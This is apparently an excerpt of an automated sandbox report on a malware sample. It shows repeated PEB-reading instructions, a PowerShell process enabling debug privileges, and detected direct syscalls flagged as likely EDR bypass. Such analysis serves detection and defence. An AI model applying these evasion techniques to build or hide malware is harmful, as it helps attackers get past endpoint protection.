Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20468770 mov eax, dword ptr fs:[00000030h] 8_2_20468770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470770 mov eax, dword ptr fs:[00000030h] 8_2_20470770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470770 mov eax, dword ptr fs:[00000030h] 8_2_20470770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470770 mov eax, dword ptr fs:[00000030h] 8_2_20470770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470770 mov eax, dword ptr fs:[00000030h] 8_2_20470770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470770 mov eax, dword ptr fs:[00000030h] 8_2_20470770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470770 mov eax, dword ptr fs:[00000030h] 8_2_20470770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470770 mov eax, dword ptr fs:[00000030h] 8_2_20470770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470770 mov eax, dword ptr fs:[00000030h] 8_2_20470770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470770 mov eax, dword ptr fs:[00000030h] 8_2_20470770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470770 mov eax, dword ptr fs:[00000030h] 8_2_20470770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470770 mov eax, dword ptr fs:[00000030h] 8_2_20470770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470770 mov eax, dword ptr fs:[00000030h] 8_2_20470770
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049C700 mov eax, dword ptr fs:[00000030h] 8_2_2049C700
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20460710 mov eax, dword ptr fs:[00000030h] 8_2_20460710
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20490710 mov eax, dword ptr fs:[00000030h] 8_2_20490710
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049C720 mov eax, dword ptr fs:[00000030h] 8_2_2049C720
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049C720 mov eax, dword ptr fs:[00000030h] 8_2_2049C720
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049273C mov eax, dword ptr fs:[00000030h] 8_2_2049273C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049273C mov ecx, dword ptr fs:[00000030h] 8_2_2049273C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049273C mov eax, dword ptr fs:[00000030h] 8_2_2049273C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DC730 mov eax, dword ptr fs:[00000030h] 8_2_204DC730
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046C7C0 mov eax, dword ptr fs:[00000030h] 8_2_2046C7C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E07C3 mov eax, dword ptr fs:[00000030h] 8_2_204E07C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204827ED mov eax, dword ptr fs:[00000030h] 8_2_204827ED
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204827ED mov eax, dword ptr fs:[00000030h] 8_2_204827ED
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204827ED mov eax, dword ptr fs:[00000030h] 8_2_204827ED
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204EE7E1 mov eax, dword ptr fs:[00000030h] 8_2_204EE7E1
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204647FB mov eax, dword ptr fs:[00000030h] 8_2_204647FB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204647FB mov eax, dword ptr fs:[00000030h] 8_2_204647FB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050678E mov eax, dword ptr fs:[00000030h] 8_2_2050678E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204607AF mov eax, dword ptr fs:[00000030h] 8_2_204607AF
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205147A0 mov eax, dword ptr fs:[00000030h] 8_2_205147A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20472840 mov ecx, dword ptr fs:[00000030h] 8_2_20472840
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20490854 mov eax, dword ptr fs:[00000030h] 8_2_20490854
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20464859 mov eax, dword ptr fs:[00000030h] 8_2_20464859
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20464859 mov eax, dword ptr fs:[00000030h] 8_2_20464859
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204EE872 mov eax, dword ptr fs:[00000030h] 8_2_204EE872
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204EE872 mov eax, dword ptr fs:[00000030h] 8_2_204EE872
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F6870 mov eax, dword ptr fs:[00000030h] 8_2_204F6870
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F6870 mov eax, dword ptr fs:[00000030h] 8_2_204F6870
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204EC810 mov eax, dword ptr fs:[00000030h] 8_2_204EC810
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050483A mov eax, dword ptr fs:[00000030h] 8_2_2050483A
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050483A mov eax, dword ptr fs:[00000030h] 8_2_2050483A
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A830 mov eax, dword ptr fs:[00000030h] 8_2_2049A830
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20482835 mov eax, dword ptr fs:[00000030h] 8_2_20482835
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20482835 mov eax, dword ptr fs:[00000030h] 8_2_20482835
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20482835 mov eax, dword ptr fs:[00000030h] 8_2_20482835
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20482835 mov ecx, dword ptr fs:[00000030h] 8_2_20482835
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20482835 mov eax, dword ptr fs:[00000030h] 8_2_20482835
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20482835 mov eax, dword ptr fs:[00000030h] 8_2_20482835
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048E8C0 mov eax, dword ptr fs:[00000030h] 8_2_2048E8C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205308C0 mov eax, dword ptr fs:[00000030h] 8_2_205308C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049C8F9 mov eax, dword ptr fs:[00000030h] 8_2_2049C8F9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049C8F9 mov eax, dword ptr fs:[00000030h] 8_2_2049C8F9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052A8E4 mov eax, dword ptr fs:[00000030h] 8_2_2052A8E4
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20460887 mov eax, dword ptr fs:[00000030h] 8_2_20460887
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204EC89D mov eax, dword ptr fs:[00000030h] 8_2_204EC89D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E0946 mov eax, dword ptr fs:[00000030h] 8_2_204E0946
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534940 mov eax, dword ptr fs:[00000030h] 8_2_20534940
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A096E mov eax, dword ptr fs:[00000030h] 8_2_204A096E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A096E mov edx, dword ptr fs:[00000030h] 8_2_204A096E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A096E mov eax, dword ptr fs:[00000030h] 8_2_204A096E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20504978 mov eax, dword ptr fs:[00000030h] 8_2_20504978
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20504978 mov eax, dword ptr fs:[00000030h] 8_2_20504978
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20486962 mov eax, dword ptr fs:[00000030h] 8_2_20486962
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20486962 mov eax, dword ptr fs:[00000030h] 8_2_20486962
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20486962 mov eax, dword ptr fs:[00000030h] 8_2_20486962
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204EC97C mov eax, dword ptr fs:[00000030h] 8_2_204EC97C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE908 mov eax, dword ptr fs:[00000030h] 8_2_204DE908
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE908 mov eax, dword ptr fs:[00000030h] 8_2_204DE908
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204EC912 mov eax, dword ptr fs:[00000030h] 8_2_204EC912
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20458918 mov eax, dword ptr fs:[00000030h] 8_2_20458918
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20458918 mov eax, dword ptr fs:[00000030h] 8_2_20458918
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E892A mov eax, dword ptr fs:[00000030h] 8_2_204E892A
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F892B mov eax, dword ptr fs:[00000030h] 8_2_204F892B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052A9D3 mov eax, dword ptr fs:[00000030h] 8_2_2052A9D3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F69C0 mov eax, dword ptr fs:[00000030h] 8_2_204F69C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h] 8_2_2046A9D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h] 8_2_2046A9D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h] 8_2_2046A9D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h] 8_2_2046A9D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h] 8_2_2046A9D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h] 8_2_2046A9D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204949D0 mov eax, dword ptr fs:[00000030h] 8_2_204949D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204EE9E0 mov eax, dword ptr fs:[00000030h] 8_2_204EE9E0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204929F9 mov eax, dword ptr fs:[00000030h] 8_2_204929F9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204929F9 mov eax, dword ptr fs:[00000030h] 8_2_204929F9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204609AD mov eax, dword ptr fs:[00000030h] 8_2_204609AD
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204609AD mov eax, dword ptr fs:[00000030h] 8_2_204609AD
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E89B3 mov esi, dword ptr fs:[00000030h] 8_2_204E89B3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E89B3 mov eax, dword ptr fs:[00000030h] 8_2_204E89B3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E89B3 mov eax, dword ptr fs:[00000030h] 8_2_204E89B3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h] 8_2_20466A50
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h] 8_2_20466A50
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h] 8_2_20466A50
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h] 8_2_20466A50
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h] 8_2_20466A50
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h] 8_2_20466A50
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h] 8_2_20466A50
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470A5B mov eax, dword ptr fs:[00000030h] 8_2_20470A5B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470A5B mov eax, dword ptr fs:[00000030h] 8_2_20470A5B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049CA6F mov eax, dword ptr fs:[00000030h] 8_2_2049CA6F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049CA6F mov eax, dword ptr fs:[00000030h] 8_2_2049CA6F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049CA6F mov eax, dword ptr fs:[00000030h] 8_2_2049CA6F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050EA60 mov eax, dword ptr fs:[00000030h] 8_2_2050EA60
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DCA72 mov eax, dword ptr fs:[00000030h] 8_2_204DCA72
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DCA72 mov eax, dword ptr fs:[00000030h] 8_2_204DCA72
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204ECA11 mov eax, dword ptr fs:[00000030h] 8_2_204ECA11
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048EA2E mov eax, dword ptr fs:[00000030h] 8_2_2048EA2E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049CA24 mov eax, dword ptr fs:[00000030h] 8_2_2049CA24
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049CA38 mov eax, dword ptr fs:[00000030h] 8_2_2049CA38
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20484A35 mov eax, dword ptr fs:[00000030h] 8_2_20484A35
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20484A35 mov eax, dword ptr fs:[00000030h] 8_2_20484A35
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204B6ACC mov eax, dword ptr fs:[00000030h] 8_2_204B6ACC
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204B6ACC mov eax, dword ptr fs:[00000030h] 8_2_204B6ACC
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204B6ACC mov eax, dword ptr fs:[00000030h] 8_2_204B6ACC
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20460AD0 mov eax, dword ptr fs:[00000030h] 8_2_20460AD0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20494AD0 mov eax, dword ptr fs:[00000030h] 8_2_20494AD0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20494AD0 mov eax, dword ptr fs:[00000030h] 8_2_20494AD0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049AAEE mov eax, dword ptr fs:[00000030h] 8_2_2049AAEE
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049AAEE mov eax, dword ptr fs:[00000030h] 8_2_2049AAEE
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h] 8_2_2046EA80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h] 8_2_2046EA80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h] 8_2_2046EA80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h] 8_2_2046EA80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h] 8_2_2046EA80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h] 8_2_2046EA80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h] 8_2_2046EA80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h] 8_2_2046EA80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h] 8_2_2046EA80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534A80 mov eax, dword ptr fs:[00000030h] 8_2_20534A80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20498A90 mov edx, dword ptr fs:[00000030h] 8_2_20498A90
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20468AA0 mov eax, dword ptr fs:[00000030h] 8_2_20468AA0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20468AA0 mov eax, dword ptr fs:[00000030h] 8_2_20468AA0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204B6AA4 mov eax, dword ptr fs:[00000030h] 8_2_204B6AA4
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050EB50 mov eax, dword ptr fs:[00000030h] 8_2_2050EB50
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20532B57 mov eax, dword ptr fs:[00000030h] 8_2_20532B57
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20532B57 mov eax, dword ptr fs:[00000030h] 8_2_20532B57
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20532B57 mov eax, dword ptr fs:[00000030h] 8_2_20532B57
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20532B57 mov eax, dword ptr fs:[00000030h] 8_2_20532B57
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F6B40 mov eax, dword ptr fs:[00000030h] 8_2_204F6B40
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F6B40 mov eax, dword ptr fs:[00000030h] 8_2_204F6B40
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052AB40 mov eax, dword ptr fs:[00000030h] 8_2_2052AB40
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20508B42 mov eax, dword ptr fs:[00000030h] 8_2_20508B42
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20458B50 mov eax, dword ptr fs:[00000030h] 8_2_20458B50
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20514B4B mov eax, dword ptr fs:[00000030h] 8_2_20514B4B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20514B4B mov eax, dword ptr fs:[00000030h] 8_2_20514B4B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045CB7E mov eax, dword ptr fs:[00000030h] 8_2_2045CB7E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h] 8_2_204DEB1D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h] 8_2_204DEB1D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h] 8_2_204DEB1D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h] 8_2_204DEB1D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h] 8_2_204DEB1D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h] 8_2_204DEB1D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h] 8_2_204DEB1D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h] 8_2_204DEB1D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h] 8_2_204DEB1D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534B00 mov eax, dword ptr fs:[00000030h] 8_2_20534B00
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048EB20 mov eax, dword ptr fs:[00000030h] 8_2_2048EB20
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048EB20 mov eax, dword ptr fs:[00000030h] 8_2_2048EB20
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20528B28 mov eax, dword ptr fs:[00000030h] 8_2_20528B28
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20528B28 mov eax, dword ptr fs:[00000030h] 8_2_20528B28
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050EBD0 mov eax, dword ptr fs:[00000030h] 8_2_2050EBD0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20480BCB mov eax, dword ptr fs:[00000030h] 8_2_20480BCB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20480BCB mov eax, dword ptr fs:[00000030h] 8_2_20480BCB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20480BCB mov eax, dword ptr fs:[00000030h] 8_2_20480BCB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20460BCD mov eax, dword ptr fs:[00000030h] 8_2_20460BCD
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20460BCD mov eax, dword ptr fs:[00000030h] 8_2_20460BCD
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20460BCD mov eax, dword ptr fs:[00000030h] 8_2_20460BCD
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048EBFC mov eax, dword ptr fs:[00000030h] 8_2_2048EBFC
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20468BF0 mov eax, dword ptr fs:[00000030h] 8_2_20468BF0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20468BF0 mov eax, dword ptr fs:[00000030h] 8_2_20468BF0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20468BF0 mov eax, dword ptr fs:[00000030h] 8_2_20468BF0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204ECBF0 mov eax, dword ptr fs:[00000030h] 8_2_204ECBF0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtOpenKeyEx: Direct from: 0x77672B9C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtProtectVirtualMemory: Direct from: 0x77672F9C Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtCreateFile: Direct from: 0x77672FEC Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtOpenFile: Direct from: 0x77672DCC Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtProtectVirtualMemory: Direct from: 0x77667B2E Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtQueryInformationToken: Direct from: 0x77672CAC Jump to behavior
